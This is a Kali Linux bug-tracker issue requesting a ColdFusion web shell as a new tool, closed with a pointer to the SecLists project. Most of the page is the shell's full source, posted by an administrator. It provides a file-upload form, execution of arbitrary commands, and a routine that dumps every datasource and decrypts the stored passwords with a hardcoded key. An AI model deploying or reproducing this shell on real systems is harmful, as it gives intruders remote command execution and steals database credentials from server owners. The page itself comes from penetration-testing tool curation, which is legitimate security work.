View Issue Details

IDProjectCategoryView StatusLast Update
0001002Kali LinuxNew Tool Requestspublic2020-03-25 13:26
Reporteroffsec_student1 Assigned Tog0tmi1k  
PrioritynormalSeverityfeatureReproducibilityalways
Status closedResolutionno change required 
Platformx64OSKaliOS Version1.0
Summary0001002: ColdFusion Shell Web Shell
Description

Found a ColdFusion WebShell that allows file uploads and file execution.

Successfully tested on ColdFusion 8

I didn't write the code but it can be found at:

http://pastebin.com/3HKGQCWF

Activities

g0tmi1k

g0tmi1k

2018-01-29 14:48

administrator   ~0008371

To help speed up the process of evaluating the tool, please make sure to include the following information (the more information you include, the more beneficial it will for us):

  • [Name] - The name of the tool
  • [Version] - What version of the tool should be added?
    --- If it uses source control (such as git), please make sure there is a release to match (e.g. git tag)
  • [Homepage] - Where can the tool be found online? Where to go to get more information?
  • [Download] - Where to go to get the tool?
  • [Author] - Who made the tool?
  • [Licence] - How is the software distributed? What conditions does it come with?
  • [Description] - What is the tool about? What does it do?
  • [Dependencies] - What is needed for the tool to work?
  • [Similar tools] - What other tools are out there?
  • [How to install] - How do you compile it?
  • [How to use] - What are some basic commands/functions to demonstrate it?
g0tmi1k

g0tmi1k

2020-02-10 18:04

administrator   ~0012182

Pastebin has been deleted

https://web.archive.org/web/20170322222809/http://pastebin.com/3HKGQCWF

g0tmi1k

g0tmi1k

2020-02-10 18:04

administrator   ~0012183

<html>
<body>

<!-- orig author: kGrutzmacher  -->
<!-- additshonz: lawKnee        -->
<b>Notes:</b><br>
<ul>
<li>For Windows put this as command &quot;c:\windows\system32\cmd.exe /c&quot; or wherever cmd.exe is<br>
<li>For Windows options are the command you want to run &quot;dir&quot; &quot;type&quot; etc
</ul>
<p>

&lt;cfoutput>

&lt;cfif isDefined(&quot;fileUpload&quot;)>
  &lt;cffile action=&quot;upload&quot;
    fileField=&quot;fileUpload&quot;
    destination=&quot;C:\&quot;>
     <p>Your file has been uploaded.</p>
&lt;/cfif>
&lt;form enctype=&quot;multipart/form-data&quot; method=&quot;post&quot;>
&lt;input type=&quot;file&quot; name=&quot;fileUpload&quot; /><br />
&lt;input type=&quot;submit&quot; value=&quot;Upload File&quot; />
&lt;/form>

&lt;table>
&lt;form method=&quot;POST&quot; action=&quot;&quot;>
&lt;tr>&lt;td>Command:&lt;/td>&lt;td>&lt;input type=text name=&quot;cmd&quot; size=50
 &lt;cfif isdefined(&quot;form.cmd&quot;)>value=&quot;#form.cmd#&quot;&lt;/cfif>><br>&lt;/td>&lt;/tr>
&lt;tr>&lt;td>Options:&lt;/td>&lt;td> &lt;input type=text name=&quot;opts&quot; size=50
 &lt;cfif isdefined(&quot;form.opts&quot;)>value=&quot;#form.opts#&quot;&lt;/cfif>><br>&lt;/td>&lt;/tr>
&lt;tr>&lt;td>Timeout:&lt;/td>&lt;td> &lt;input type=text name=&quot;timeout&quot; size=4
 &lt;cfif isdefined(&quot;form.timeout&quot;)>value=&quot;#form.timeout#&quot;
 &lt;cfelse>value=&quot;5&quot;&lt;/cfif>>&lt;/td>&lt;/tr>
&lt;/table>
&lt;input type=submit value=&quot;Exec&quot; >
&lt;/form>

&lt;cfif isdefined(&quot;form.cmd&quot;)>
&lt;cfsavecontent variable=&quot;myVar&quot;>
&lt;cfexecute name = &quot;#Form.cmd#&quot;
  arguments = &quot;#Form.opts#&quot;
  timeout = &quot;#Form.timeout#&quot;>
&lt;/cfexecute>
&lt;/cfsavecontent>
<pre>
#HTMLCodeFormat(myVar)#
</pre>
&lt;/cfif>

&lt;cfscript>
//The following code borrowed from hernanOchoa @hexale (thx)  
//added better formatting on output and connection string [lb]

// Create Data Source Object
dataSourceObb=createobject(&quot;java&quot;,&quot;coldfusion.server.ServiceFactory&quot;).
        getDatasourceService().getDatasources();
        writeoutput(&quot;<br><br><b>Datasource Credentials:</b><br>&quot;);
        writeoutput(&quot;&lt;table>&quot;);
// Loop Through DataSources
for(i in dataSourceObb) {
        if(len(dataSourceObb[i][&quot;password&quot;])){

        // Get url
        theurl=(dataSourceObb[i][&quot;url&quot;]);

        // Get username
        username=(dataSourceObb[i][&quot;username&quot;]);

        // Get and decrypt password
        decryptPassword=Decrypt(dataSourceObb[i][&quot;password&quot;],
        generate3DesKey(&quot;0yJ!@1$r8p0L@r1$6yJ!@1rj&quot;), &quot;DESede&quot;,
     &quot;Base64&quot;);

        // Output datasource usernames, passwords, and urls
        writeoutput(&quot;&quot; &
        &quot;&lt;tr>&lt;td>DataSource: &quot; & i & &quot;&lt;/td>&quot; &
        &quot;&lt;td>Username: &quot; & username & &quot;&lt;/td>&quot; &
        &quot;&lt;td>Password: &quot; & decryptPassword &
        &quot;&lt;td>URL: &quot; & theurl & &quot;&lt;/td>&lt;/tr>&quot;);
        }
}
writeoutput(&quot;&lt;/table><br>&quot;);
&lt;/cfscript>
&lt;/cfoutput>
&lt;/body>
&lt;/html>
g0tmi1k

g0tmi1k

2020-03-25 13:04

administrator   ~0012520

My gut says this would be better for the seclists project - will add it there :)

g0tmi1k

g0tmi1k

2020-03-25 13:26

administrator   ~0012537

https://github.com/danielmiessler/SecLists/pull/400

Issue History

Date Modified Username Field Change
2014-01-29 09:38 offsec_student1 New Issue
2018-01-29 14:48 g0tmi1k Note Added: 0008371
2018-02-21 09:35 g0tmi1k Product Version 1.0.4 =>
2019-12-09 13:30 g0tmi1k Severity minor => feature
2020-02-10 18:04 g0tmi1k Note Added: 0012182
2020-02-10 18:04 g0tmi1k Note Added: 0012183
2020-03-25 13:04 g0tmi1k Note Added: 0012520
2020-03-25 13:20 g0tmi1k Assigned To => g0tmi1k
2020-03-25 13:20 g0tmi1k Status new => closed
2020-03-25 13:20 g0tmi1k Resolution open => no change required
2020-03-25 13:26 g0tmi1k Note Added: 0012537